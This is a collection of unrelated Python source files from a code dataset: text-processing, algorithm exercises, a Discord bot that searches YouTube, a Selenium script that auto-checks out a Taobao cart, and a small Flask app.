MorphologicalToken(element['text'], element['analysis'][0]['lex'])\n                morph_token.mystem_tags = element['analysis'][0]['gr']\n                morph_tokens.append(morph_token)\n        for token in morph_tokens:\n            token_pymorphy = pymorphy_analyser.parse(token.original_word)[0]\n            token.pymorphy_tags = token_pymorphy.tag\n        return morph_tokens
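\n\n    # Added sketch (illustrative, not from the original): each processed token is\n    # rendered by MorphologicalToken.__str__ as lemma<mystem_tags>(pymorphy_tags),\n    # e.g. with only the mystem tags set (tag values here are hypothetical):\n    # token = MorphologicalToken('столах', 'стол')\n    # token.mystem_tags = 'S,муж,неод=пр,мн'\n    # str(token)  # -> 'стол<S,муж,неод=пр,мн>()'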
\n\n    def public_method(self):\n        pass\n\n\ndef validate_dataset(path_to_validate):\n    \"\"\"\n    Validates folder with assets\n    \"\"\"\n    path = Path(path_to_validate)\n    if not isinstance(path_to_validate, str):\n        raise UnknownDatasetError\n    if path.exists():\n        if not path.is_dir():\n            raise NotADirectoryError\n        if not list(path.iterdir()):\n            raise EmptyDirectoryError\n        counter_raw = 0\n        counter_meta = 0\n        for element in path.iterdir():\n            if str(element).endswith('_raw.txt'):\n                counter_raw += 1\n            if str(element).endswith('_meta.json'):\n                counter_meta += 1\n        if not counter_raw == counter_meta:\n            raise InconsistentDatasetError\n    else:\n        raise FileNotFoundError\n\n\ndef main():\n    print('Your code goes here')\n\n    validate_dataset(ASSETS_PATH)\n    corpus_manager = CorpusManager(ASSETS_PATH)\n    pipeline = TextProcessingPipeline(corpus_manager)\n    pipeline.run()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151414068","text":"'''\r\nCreated on Sep 4, 2016\r\n\r\n@author: sanjay\r\n\r\n@summary: Simple Binary Search Algorithm Program.\r\n\r\n@note: Binary search works only on Sorted List\r\n'''\r\n\r\ndef binary_search(a, x, lo=0, hi=None):\r\n    if hi is None:\r\n        hi = len(a)\r\n    while lo < hi:\r\n        mid = (lo+hi)//2\r\n        midval = a[mid]\r\n        if midval < x:\r\n            lo = mid+1\r\n        elif midval > x: \r\n            hi = mid\r\n        else:\r\n            return mid\r\n    return -1\r\n\r\n\r\ndata_list = list(range(30))\r\n\r\ndata = 2\r\n\r\npos = binary_search(data_list,data)\r\n\r\nif pos == -1:\r\n    print(\"{} not found in the list\".format(data))\r\nelse:\r\n    print(\"{} found at position {} \".format(data,pos))\r\n","sub_path":"Python_DS_Exercise/Searching/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55438588","text":"'''\n@Description: \n@Version: 1.0\n@Autor: Henggao\n@Date: 2020-03-15 18:48:06\n@LastEditors: Henggao\n@LastEditTime: 2020-03-16 13:35:10\n'''\n\nfrom random import choice\n\n\nclass RandomWalk():\n    '''A class to generate random walk data'''\n\n    def __init__(self, num_points=5000):\n        '''Initialize the attributes of a walk'''\n        self.num_points = num_points\n\n        # all random walks start at (0, 0)\n        self.x_values = [0]\n        self.y_values = [0]\n\n    def get_step(self):\n        '''Decide the distance and direction of one step and compute the move'''\n        direction = choice([1,-1])\n        distance = choice([0, 1, 2, 3, 4])\n        step = direction * distance\n        return step\n\n    def fill_walk(self):\n        '''Calculate all the points in the walk'''\n\n        # keep taking steps until the walk reaches the desired length\n        while len(self.x_values) < self.num_points:\n            # decide the direction and how far to move in that direction\n            # x_direction = choice([1,-1])\n            # x_distance = choice([0, 1, 2, 3, 4])\n            # x_step = x_direction * x_distance\n            x_step = self.get_step()\n\n            # y_direction = choice([1,-1])\n            # y_distance = choice([0, 1, 2, 3, 4])\n            # y_step = y_direction * y_distance\n            y_step = self.get_step()\n\n            # reject steps that go nowhere\n            if x_step == 0 and y_step == 0:\n                continue\n\n            # calculate the next x and y values\n            next_x = self.x_values[-1] + x_step\n            next_y = self.y_values[-1] + y_step\n\n            self.x_values.append(next_x)\n            self.y_values.append(next_y)
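\n\n# Added sketch (not in the original): build one walk and inspect its extent.\n# rw = RandomWalk(1000)\n# rw.fill_walk()\n# print(min(rw.x_values), max(rw.x_values), min(rw.y_values), max(rw.y_values))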
\n\n\n","sub_path":"Pythonvisual/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387873799","text":"# python3\r\nimport sys\r\n\r\ndef BWT(text):\r\n    bwt_matrix = []\r\n    for i in range(len(text)):\r\n        # rotation i: the suffix starting at i followed by the prefix before i\r\n        rotation = text[i:] + text[:i]\r\n        bwt_matrix.append(rotation)\r\n    # the transform is the last column of the sorted rotation matrix\r\n    return ''.join(b[-1] for b in sorted(bwt_matrix))\r\n\r\nif __name__ == '__main__':\r\n    text = sys.stdin.readline().strip()\r\n    print(BWT(text))\r\n","sub_path":"Algorithms Specialization UCSD/string/pa02/bwt.py","file_name":"bwt.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253283662","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import when_mentioned_or\nimport aiohttp\nimport re\nimport asyncio\nfrom apiclient.discovery import build #youtube api\nimport sys\nimport time\nimport json\nfrom random import choice as randchoice\nimport git\nimport logging\nimport logging.handlers\nimport traceback\nimport datetime\nimport subprocess\n\n\ndescription = '''Youtube bot for Discord. Searches YouTube and responds with a link to a video.'''\n\nbot = commands.Bot(command_prefix=when_mentioned_or('yt '), description=description, shard_id=0, shard_count=3)\nsession = aiohttp.ClientSession(loop=bot.loop)\n\nsys.modules['win32file'] = None #Some systems will crash without this because Google's Python is built differently\nkey = ''\ncarbon_key = ''\ndbots_key = ''\n\n@bot.event\nasync def on_ready():\n    global logger\n    if not hasattr(bot, \"uptime\"):\n        bot.uptime = int(time.perf_counter())\n    logger.info(\"-- Logging in... --\")\n    logger.info(\"Logged in as {}\".format(bot.user.name))\n    logger.info(\"Shard ID: {}\".format(bot.shard_id))\n    logger.info(\"------\")\n    await bot.change_presence(game=discord.Game(name='yt help'), status=discord.Status.dnd) # look at that fancy red-ness\n    await bot.update()\n    comm_count = 0\n\n@bot.event\nasync def update():\n\n    payload = json.dumps({\n        'server_count': len(bot.servers)\n    })\n\n    headers = {\n        'authorization': dbots_key,\n        'content-type': 'application/json'\n    }\n\n    DISCORD_BOTS_API = 'https://bots.discord.pw/api'\n\n    url = '{0}/bots/205224819883638785/stats'.format(DISCORD_BOTS_API)\n    async with session.post(url, data=payload, headers=headers) as resp:\n        logger.info('SERVER COUNT UPDATED.\\nDBots statistics returned {0.status} for {1}\\n'.format(resp, payload))\n\n    CARBONITEX_API_BOTDATA = 'https://www.carbonitex.net/discord/data/botdata.php'\n    carbon_payload = {\n        'key': carbon_key,\n        'servercount': len(bot.servers)\n    }\n    async with session.post(CARBONITEX_API_BOTDATA, data=carbon_payload) as resp:\n        logger.info('Carbon statistics returned {0.status} for {1}'.format(resp, carbon_payload))\n\n@bot.event\nasync def on_server_join(server):\n    await bot.update()\n\n@bot.event\nasync def on_server_leave(server):\n    await bot.update()\n\ndef set_logger():\n    global logger\n    logger = logging.getLogger(\"discord\")\n    logger.setLevel(logging.WARNING)\n    handler = logging.FileHandler(\n        filename='discord.log', encoding='utf-8', mode='a')\n    handler.setFormatter(logging.Formatter(\n        '%(asctime)s %(levelname)s Discord: %(funcName)s %(lineno)d: '\n        '%(message)s',\n        datefmt=\"[%d/%m/%Y %H:%M]\"))\n    logger.addHandler(handler)\n\n    logger = logging.getLogger(\"yt\")\n    logger.setLevel(logging.INFO)\n\n    yt_format = logging.Formatter(\n        '%(asctime)s %(levelname)s YouTube Code: %(funcName)s %(lineno)d: '\n        '%(message)s',\n        datefmt=\"[%d/%m/%Y %H:%M]\")\n\n    stdout_handler = logging.StreamHandler(sys.stdout)\n    stdout_handler.setFormatter(yt_format)\n    stdout_handler.setLevel(logging.INFO)\n\n    fhandler = 
logging.handlers.RotatingFileHandler(\n filename='yt.log', encoding='utf-8', mode='a',\n maxBytes=10**7, backupCount=5)\n fhandler.setFormatter(yt_format)\n\n logger.addHandler(fhandler)\n logger.addHandler(stdout_handler)\n\n@bot.event\nasync def on_command_error(error, ctx):\n if isinstance(error, commands.MissingRequiredArgument):\n await send_cmd_help(ctx)\n elif isinstance(error, commands.BadArgument):\n await send_cmd_help(ctx)\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.bot.send_message(ctx.message.channel, \"Woah there, {}. That command is on cooldown!\".format(ctx.message.author.mention))\n elif isinstance(error, commands.CommandInvokeError):\n logger.exception(\"Exception in command '{}'\".format(\n ctx.command.qualified_name), exc_info=error.original)\n oneliner = \"Error in command '{}' - {}: {}\".format(\n ctx.command.qualified_name, type(error.original).__name__,\n str(error.original))\n await ctx.bot.send_message(ctx.message.channel, oneliner)\n elif isinstance(error, commands.CommandNotFound):\n pass\n elif isinstance(error, commands.CheckFailure):\n pass\n else:\n logger.exception(type(error).__name__, exc_info=error)\n\n@bot.command(aliases=[\"dpy\"], pass_context=True, hidden=True)\nasync def updpy(ctx):\n if ctx.message.author.id == \"116079569349378049\":\n command = subprocess.Popen([\"pip3\", \"install\", \"-U\", \"git+https://github.com/Rapptz/discord.py@master#egg=discord.py[voice]\"], stdout=subprocess.PIPE)\n output = command.stdout.read().decode()\n await bot.say(\"```\" + output + \"```\")\n if \"Already up-to-date.\" not in output:\n await bot.say(\"Restarting now to apply changes...\")\n session.close()\n await bot.logout()\n\n\n@bot.command(aliases=[\"v\"])\n@commands.cooldown(1, 60, commands.BucketType.server)\nasync def version():\n \"\"\"Shows the changelog and version of the bot\"\"\"\n msg = \"```diff\\n\"\n msg += \"- YouTube\\n\\n\"\n #msg += \"CURRENTLY TESTING\\n\"\n msg += \"! Current Version: 1.6.1\"\n msg += \"\\n\\n\"\n msg += \"+ What's new?\\n\\n\"\n msg += \"! 1.6 - 1.6.1\\n--- Added reverse lookup of videos. `yt stats`.\\n--- Also, new help server! Whoop! https://discord.gg/yp8WpMh\\n\\n\"\n msg += \"! 1.5\\n--- Massive cleanup of code. More organised. Added cooldown warnings (available by typing `yt cooldowns`). Added logging. Errors should mostly be gone.\\n\\n\"\n msg += \"! 1.4.3\\n--- Added info command.\\n\\n\"\n msg += \"! 1.4\\n--- Channel Search\\n\\n+ Shows the title & sub count of the channel\\n+ Shows the description\\n+ Shows the thumbnail (or tries to!)\\n\\n\"\n msg += \"```\\n\"\n msg += \"View the full changelog here: \\n\"\n # msg += \"! 1.3.1 - 1.3.3\\n--- Added cooldowns to commands and cleaned up messy bits of code.\\n\\n\"\n # msg += \"! 1.3\\n--- Now Playing URL for Discord.FM\\n\\n\"\n # msg += \"! 1.2.1\\n--- Inital aesthetics changes. New randomised ping messages.\\n\\n\"\n # msg += \"! 1.2\\n--- Added video title and uploader when displaying video result, for when embeds are turned off.\\n\\n\"\n # msg += \"! 1.1\\n--- Moved to the official YouTube search API\\n\\n\"\n # msg += \"! 
1.0\\n--- Initial release.```\\n\"\n msg += \"For more info, ask for @\\U0000200BFrancis#6565 on this server: https://discord.gg/yp8WpMh\"\n await bot.say(msg)\n comm_count += 1\n\n@bot.command(pass_context=True)\nasync def cooldowns(ctx):\n msg = \"__Command cooldowns:__\\n\\n\"\n msg += \"Search: 5/60s per server\\n\"\n msg += \"Channel: 5/60s per server\\n\"\n msg += \"Version: 1/60s per server\\n\"\n msg += \"Info: 1/60s per server\\n\"\n if ctx.message.server.id == '143686242687647745':\n msg += \"Now playing: 30/600s\\n\"\n msg += \"Stats: 1/300s per server\"\n await bot.say(msg)\n comm_count += 1\n\n@bot.command()\n@commands.cooldown(1, 60, commands.BucketType.server)\nasync def info():\n \"\"\"Shows some info about this boat.\"\"\"\n msg = \"Hi there! I'm __**YouTube**__, a bot made by **@\\U0000200BFrancis#6565**.\\n\\n\"\n msg += \"I'm made in Python using the `discord.py` library, and I'm here to interact with **YouTube via Discord**, so you don't have to.\\n\\n\"\n msg += \"__**What can I do?**__\\n\\n\"\n msg += \"- I can search YouTube for a video.\\n- I can search YouTube for a channel.\\n- I *can* do other stuff... But it's in testing!\\n\\nFor more info, join the YouTube help server (https://discord.gg/yp8WpMh) and ask for @\\U0000200BFrancis#6565.\"\n await bot.say(msg)\n comm_count += 1\n\n# ------------------------------------------------------------------------------------------------------------ # \n# ____ _ _ _____ __ __ ____ _ __ __ #\n# | _ \\ (_) ___ ___ ___ _ __ __| | | ___| | \\/ | / ___| | |_ _ _ / _| / _| #\n# | | | | | | / __| / __| / _ \\ | '__| / _` | | |_ | |\\/| | \\___ \\ | __| | | | | | |_ | |_ #\n# | |_| | | | \\__ \\ | (__ | (_) | | | | (_| | _ | _| | | | | ___) | | |_ | |_| | | _| | _| #\n# |____/ |_| |___/ \\___| \\___/ |_| \\__,_| (_) |_| |_| |_| |____/ \\__| \\__,_| |_| |_| #\n# ------------------------------------------------------------------------------------------------------------ # \n\n\n@bot.command(aliases=[\"np\"], no_pm=True, pass_context=True, hidden=True)\n@commands.cooldown(30, 600, commands.BucketType.server)\nasync def nowplaying(ctx):\n \"\"\"Show the currently playing song on Discord.FM. Only works there.\"\"\"\n if ctx.message.server.id == '143686242687647745':\n channel = ctx.message.channel\n if (channel.id == '197142982686670848') or (channel.id == '143734628849549312'):\n await bot.say('Silly you. I can\\'t get the URL of the song playing here!')\n else:\n try:\n url = 'https://temp.discord.fm/libraries/{}/queue'.format(channel)\n async with aiohttp.get(url) as r:\n data = await r.json()\n song = data['current']\n if song['service'] == 'YouTubeVideo':\n vid = song['identifier']\n await bot.say('\\N{BLACK RIGHT-POINTING TRIANGLE} Currently playing in __{}__: https://youtube.com/watch?v={}'.format(channel, vid))\n elif song['service'] == 'SoundCloudTrack':\n track = song['identifier']\n await bot.say('\\N{BLACK RIGHT-POINTING TRIANGLE} Currently playing in __{}__: https://soundcloud.com/{}'.format(channel, track))\n except:\n await bot.say('Could not get Now Playing data or this is a new service. \\N{EYES}')\n logger.exception('New Discord FM service found?')\n else:\n await bot.say(\"This isn't Discord.FM! 
\")\n comm_count += 1\n\n# @bot.command(pass_context=True, aliases=[\"l\"])\n# @commands.cooldown(5, 60, commands.BucketType.channel)\n# async def lookup(ctx):\n# \"\"\"Searches the DFM library for the song, and checks if it exists.\"\"\"\n# try:\n# await bot.send_typing(ctx.message.channel)\n# if len(ctx.message.content.split(' ', 2)) == 2:\n# msg = \"Arguments needed!\\n\\nExample: `yt lookup Darude Sandstorm`\"\n# else:\n# youtube = build(\"youtube\", \"v3\", developerKey=key)\n# search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"video\").execute()\n# if len(search_response.get('items')) == 0:\n# msg = \"No videos found.\"\n# else:\n# vidid = search_response.get('items')[0]['id']['videoId']\n# vidurl = \"https://www.youtube.com/watch?v=\" + vidid\n# yt_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(vidurl)\n# metadata = await get_json(yt_url)\n# title = metadata['title']\n# try:\n# url = \"https://temp.discord.fm/requests/json\"\n# async with aiohttp.get(url) as r:\n# resp = await r.json()\n# i = 0\n# for title in resp[1]:\n# lib = resp[1]\n# if title in resp[i][2]['title']:\n# await bot.say(\"{} exists in the Discord.FM database for the library {}!\".format(title, lib))\n# break\n# else:\n# i += 1\n# else:\n# await bot.say(\"That song doesn't exist in the Discord.FM database, or YouTube returned an incorrect title... ¯\\_(ツ)_/¯\")\n# except:\n# await bot.say(\"Error.\")\n# except Exception as e:\n# message = 'The bass kicked too hard... :eyes: `{}` This has been reported to the creator.'.format(e)\n# logger.exception(e)\n# await bot.say(message)\n# owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n# await bot.send_message(owner, 'Server: {}\\n\\nError in command `lookup`: {}\\n\\n'.format(ctx.message.server, e))\n\n# -------------------------------------------------------------------------------------------------------------------------------------------------------- #\n# ____ _ _ __ __ __ _____ _ ____ _ __ __ #\n# / ___| | |_ __ _ _ __ | |_ ___ / _| \\ \\ / / ___ _ _ |_ _| _ _ | |__ ___ / ___| | |_ _ _ / _| / _| #\n# \\___ \\ | __| / _` | | '__| | __| / _ \\ | |_ \\ V / / _ \\ | | | | | | | | | | | '_ \\ / _ \\ \\___ \\ | __| | | | | | |_ | |_ #\n# ___) | | |_ | (_| | | | | |_ | (_) | | _| | | | (_) | | |_| | | | | |_| | | |_) | | __/ ___) | | |_ | |_| | | _| | _| #\n# |____/ \\__| \\__,_| |_| \\__| \\___/ |_| |_| \\___/ \\__,_| |_| \\__,_| |_.__/ \\___| |____/ \\__| \\__,_| |_| |_| #\n# -------------------------------------------------------------------------------------------------------------------------------------------------------- # \n\n@bot.command(pass_context=True, aliases=[\"s\"])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def search(ctx):\n \"\"\"Searches YouTube for a video. 
\n\n Returns the first result.\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt search Darude Sandstorm`\"\n else:\n youtube = build(\"youtube\", \"v3\", developerKey=key)\n search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"video\").execute()\n if len(search_response.get('items')) == 0:\n msg = \"No videos found.\"\n else:\n vidid = search_response.get('items')[0]['id']['videoId']\n vidurl = \"https://www.youtube.com/watch?v=\" + vidid\n yt_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(vidurl)\n metadata = await get_json(yt_url)\n msg = '**Title:** _{}_\\n**Uploader:** _{}_\\n\\n<{}>'.format(metadata['title'], metadata['author_name'], vidurl)\n await bot.say(msg)\n except Exception as e:\n message = 'The bass kicked too hard... :eyes: `{}` This has been reported.'.format(e)\n logger.exception(e)\n await bot.say(message)\n owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n await bot.send_message(owner, 'Server: {}\\n\\nError in command `search` from id `{}`: {}\\n\\n'.format(ctx.message.server, vidid, e))\n comm_count += 1\n\n@bot.command(pass_context=True, aliases=[\"c\"])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def channel(ctx):\n \"\"\"Searches YouTube for a channel. \n\n Returns the first result.\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt channel TrapNation`\"\n else:\n youtube = build(\"youtube\", \"v3\", developerKey=key)\n search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"channel\").execute()\n if len(search_response.get('items')) == 0:\n msg = \"No channels found.\"\n else:\n chanid = search_response.get('items')[0]['id']['channelId']\n data = youtube.channels().list(part='statistics,snippet', id=chanid).execute()\n subs = str(data['items'][0]['statistics']['subscriberCount'])\n name = str(data['items'][0]['snippet']['title'])\n img = str(data['items'][0]['snippet']['thumbnails']['default']['url'])\n chanurl = \"https://www.youtube.com/channel/\" + chanid\n msg = '**Channel:** {}\\n**Subscribers:** {}\\n<{}>\\n\\n**Thumbnail:** {}'.format(name, subs, chanurl, img)\n await bot.say(msg)\n except Exception as e:\n message = 'Soooo... YouTube returned a video, but there was no data for it. ¯\\_(ツ)_/¯ :eyes: `{}` This has been reported to the creator.'.format(e)\n logger.exception(e)\n await bot.say(message)\n comm_count += 1\n\n@bot.command(pass_context=True, aliases=['st'])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def stats(ctx):\n \"\"\"Reverse lookup for youtube videos. 
Returns statistics and stuff\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt stats https://www.youtube.com/watch?v=dQw4w9WgXcQ`\"\n else:\n url = re.compile(r'http(?:s?):\\/\\/(?:www\\.)?youtu(?:be\\.com\\/watch\\?v=|\\.be\\/)([\\w\\-\\_]*)(&(amp;)?‌​[\\w\\?‌​=]*)?')\n shorturl = re.compile(r'http(?:s?):\\/\\/?youtu(?:\\.be\\/)([\\w\\-\\_]*)(&(amp;)?‌​[\\w\\?‌​=]*)?')\n q=ctx.message.content.split(' ', 2)[2]\n match = re.search(url, q)\n if match:\n match2 = re.search(shorturl, q)\n if match2:\n a = match2.group(1)\n q = 'https://www.youtube.com/watch?v={}'.format(a)\n vid_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(q)\n metadata = await get_json(vid_url)\n msg = '**Title:** _{}_\\n**Uploader:** _{}_\\n\\n<{}>'.format(metadata['title'], metadata['author_name'], q)\n await bot.say(msg)\n except Exception as e:\n message = 'The bass kicked too hard... :eyes: `{}` (Probably not allowed to get info for the video...) This has been reported.'.format(e)\n logger.exception(e)\n await bot.say(message)\n owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n await bot.send_message(owner, 'Server: {}\\n\\nError in command `stats` from id `{}`: {}\\n\\n'.format(ctx.message.server, q, e))\n comm_count += 1\n\n\nasync def get_json(yt_url):\n \"\"\"\n Returns the JSON from an URL.\n Expects the url to be valid and return a JSON object.\n \"\"\"\n async with aiohttp.get(yt_url) as r:\n result = await r.json()\n return result\n\n# ----------------------------------------------------------------------------------------------------------------------------------------------- #\n# _____ _ __ __ __ _____ _ ____ _ __ __ #\n# | ____| _ __ __| | ___ / _| \\ \\ / / ___ _ _ |_ _| _ _ | |__ ___ / ___| | |_ _ _ / _| / _| #\n# | _| | '_ \\ / _` | / _ \\ | |_ \\ V / / _ \\ | | | | | | | | | | | '_ \\ / _ \\ \\___ \\ | __| | | | | | |_ | |_ #\n# | |___ | | | | | (_| | | (_) | | _| | | | (_) | | |_| | | | | |_| | | |_) | | __/ ___) | | |_ | |_| | | _| | _| #\n# |_____| |_| |_| \\__,_| \\___/ |_| |_| \\___/ \\__,_| |_| \\__,_| |_.__/ \\___| |____/ \\__| \\__,_| |_| |_| #\n# ----------------------------------------------------------------------------------------------------------------------------------------------- #\n\n@bot.command(no_pm=True, hidden=True)\n@commands.cooldown(1, 40, commands.BucketType.server)\nasync def ping():\n \"\"\"Pong!\"\"\"\n choices = [\"I'm alive...\", \"What do you want?\", \"Can't you see I'm sleeping here?\", \"Ugh. 
Is it Monday again?\", \"Time to remember the most important person here.\", \"You still suck.\", \"What's your name?\"]\n await bot.say(randchoice(choices))\n comm_count += 1\n\n@bot.command(hidden=True, aliases=['bs'])\n@commands.cooldown(1, 300, commands.BucketType.server)\nasync def botstats():\n \"\"\"Statistics about the bot\"\"\"\n users = str(len([m for m in set(bot.get_all_members())]))\n msg = \"Servers: {}\".format(len(list(bot.servers)))\n msg += \"\\nUsers: {}\".format(users)\n # msg += \"\\n{} high quality videos searched.\".format(search_count)\n # msg += \"\\n{} channels searched.\".format(channel_count)\n up = abs(bot.uptime - int(time.perf_counter()))\n up = str(datetime.timedelta(seconds=up))\n msg += \"\\nShard Uptime: {}\".format(up)\n msg += \"\\nCommands since boot: {}\".format(comm_count)\n await bot.say(msg)\n comm_count += 1\n\n@bot.command(pass_context=True, hidden=True)\nasync def name(ctx, *, name):\n \"\"\"Sets the bot's name\"\"\"\n if ctx.message.author.id == '116079569349378049':\n name = name.strip()\n if name != \"\":\n await bot.edit_profile(username=name)\n await bot.say(\"Done.\")\n\n\n@bot.command(pass_context=True, hidden=True)\nasync def status(ctx, *, status=None):\n \"\"\"Sets the bot's status\n\n Leaving this empty will clear it. OWNER ONLY\"\"\"\n if ctx.message.author.id == '116079569349378049':\n if status:\n status = status.strip()\n await bot.change_status(discord.Game(name=status))\n else:\n await bot.change_status(None)\n await bot.say(\"Done.\")\n\n@bot.command(hidden=True)\nasync def avatar(url):\n \"\"\"Sets the bot's avatar\n\n OWNER ONLY\"\"\"\n if ctx.message.author.id == '116079569349378049':\n async with bot.http.session.get(url) as r:\n data = await r.read()\n await bot.edit_profile(avatar=data)\n await bot.say(\"Done.\")\n\n@bot.command()\nasync def join():\n \"\"\"Provides an OAuth link used to add the bot to the server.\"\"\"\n msg = (\"Use this link to add me to your server! Requires the `manage server` permission. 
https://is.gd/ytdiscord\")\n await bot.say(msg)\n\n@bot.command(name=\"shutdown\", aliases=[\"sd\"], no_pm=True, pass_context=True, hidden=True)\nasync def shutdown(ctx):\n \"\"\"Stops the bot.\"\"\"\n if ctx.message.author.id == '116079569349378049':\n await bot.say('Shutting down...')\n session.close()\n await bot.logout()\n\n@bot.command(aliases=[\"gp\"], hidden=True, pass_context=True)\nasync def update(ctx):\n if ctx.message.author.id == '116079569349378049':\n g = git.cmd.Git('/home/fishyfing/youtubebot')\n try:\n g.pull()\n await bot.say('Successfully updated.')\n except:\n await bot.say('Stashing changes...')\n g.stash()\n g.pull()\n await bot.say('Successfully updated...')\n\ndef main():\n set_logger()\n try:\n yield from bot.login('') #gitignore\n #login here\n except TypeError as e:\n logger.warning(e)\n msg = (\"\\nYou are using an outdated discord.py.\\n\"\n \"update your discord.py with by running this in your cmd \"\n \"prompt/terminal.\\npip3 install --upgrade git+https://\"\n \"github.com/Rapptz/discord.py@async\")\n sys.exit(msg)\n yield from bot.connect()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(main())\n except discord.LoginFailure:\n logger.error(traceback.format_exc())\n except:\n logger.error(traceback.format_exc())\n loop.run_until_complete(bot.logout())\n finally:\n loop.close()","sub_path":"youtubebot.py","file_name":"youtubebot.py","file_ext":"py","file_size_in_byte":23832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113104016","text":"from flask import Flask\nfrom blueprint import blueprints\n\nclass Framework (object):\n\n def __init__(self,debug, server, port, setup_list):\n self.setup_list = setup_list\n self.app = Flask(__name__)\n self.app.register_blueprint(blueprints)\n self.app.run(debug=debug,host=server,port=port)\n self.setup_list = setup_list\n","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186841206","text":"from selenium import webdriver\nimport datetime\nimport time\n\n# BUY_TIME = \"2021-3-5 17:50:30\"\nBUY_TIME = input()\nMAX_LOGIN_RETRY_TIMES = 6\ncurrent_retry_login_times = 0\nlogin_success = False\nbuy_time_object = datetime.datetime.strptime(BUY_TIME, '%Y-%m-%d %H:%M:%S')\n\nnow_time = datetime.datetime.now()\nif now_time > buy_time_object:\n print(\"The time has passed\")\n exit(0)\n\nprint(\"open chrome\")\n\noption = webdriver.ChromeOptions()\noption.add_argument('disable-infobars')\noption.add_argument('--blink-settings=imagesEnabled=false')\ndriver = webdriver.Chrome(chrome_options=option)\ndriver.maximize_window()\nprint(\"chrome has been opened\")\n\n\ndef __login_operates():\n driver.get(\"https://www.taobao.com\")\n # noinspection PyBroadException\n try:\n if driver.find_element_by_link_text(\"login\"):\n driver.find_element_by_link_text(\"login\").click()\n time.sleep(10)\n except:\n global login_success\n global current_retry_login_times\n login_success = True\n current_retry_login_times = 0\n\ndef login():\n print(\"login\")\n __login_operates()\n global current_retry_login_times\n while current_retry_login_times < MAX_LOGIN_RETRY_TIMES:\n current_retry_login_times = current_retry_login_times + 1\n print(\"login times:\" + str(current_retry_login_times))\n __login_operates()\n if login_success:\n print(\"successfully\")\n break\n else:\n print(\"wait for login\")\n\n if 
not login_success:\n        exit(0)\n\n    now = datetime.datetime.now()\n    print('login success:', now.strftime('%Y-%m-%d %H:%M:%S'))\n\ndef __refresh_keep_alive():\n    driver.get(\"https://cart.taobao.com/cart.htm\")\n    print(\"refresh\")\n    time.sleep(60)\n\n\ndef keep_login_and_wait():\n    print(\"long time before the time, start refreshing\")\n    while True:\n        currentTime = datetime.datetime.now()\n        if (buy_time_object - currentTime).total_seconds() > 300:\n            __refresh_keep_alive()\n        else:\n            print(\"stop refreshing\")\n            break\n\ndef buy():\n    driver.get(\"https://cart.taobao.com/cart.htm\")\n    time.sleep(1)\n    while True:\n        # noinspection PyBroadException\n        try:\n            # if driver.find_element_by_id(\"J_SelectAll2\"):\n            driver.find_element_by_id(\"J_SelectAll1\").click()\n            print(\"choose all goods\")\n            break\n        except:\n            print(\"No\")\n    submit_succ = False\n    retry_submit_times = 0\n    while True:\n        now = datetime.datetime.now()\n        if now >= buy_time_object:\n            start = time.perf_counter()\n            print(\"buy times:\" + str(retry_submit_times))\n            if submit_succ:\n                print(\"submit order\")\n                break\n            if retry_submit_times > 100:\n                print(\"give up trying\")\n                break\n\n            retry_submit_times = retry_submit_times + 1\n\n            try:\n                if driver.find_element_by_id(\"J_Go\"):\n                    driver.find_element_by_id(\"J_Go\").click()\n                    click_submit_times = 0\n                    while True:\n                        # noinspection PyBroadException\n                        try:\n                            if click_submit_times < 10:\n                                driver.find_element_by_link_text('提交订单').click()  # link text: \"Submit Order\"\n                                end = time.perf_counter()\n                                print(\"click submit button\")\n                                print(end-start)\n                                submit_succ = True\n                                break\n                            else:\n                                print(\"submit failure\")\n                        except Exception as ee:\n                            print(ee)\n                            print(\"retry\")\n                            click_submit_times = click_submit_times + 1\n                            time.sleep(0.1)\n            except Exception as e:\n                print(e)\n                # print(\"submit failure\")\n\n        time.sleep(0.1)\n\n\nlogin()\nkeep_login_and_wait()\nbuy()\n","sub_path":"Taobao-AutoBuy.py","file_name":"Taobao-AutoBuy.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158434387","text":"#!/usr/bin/env 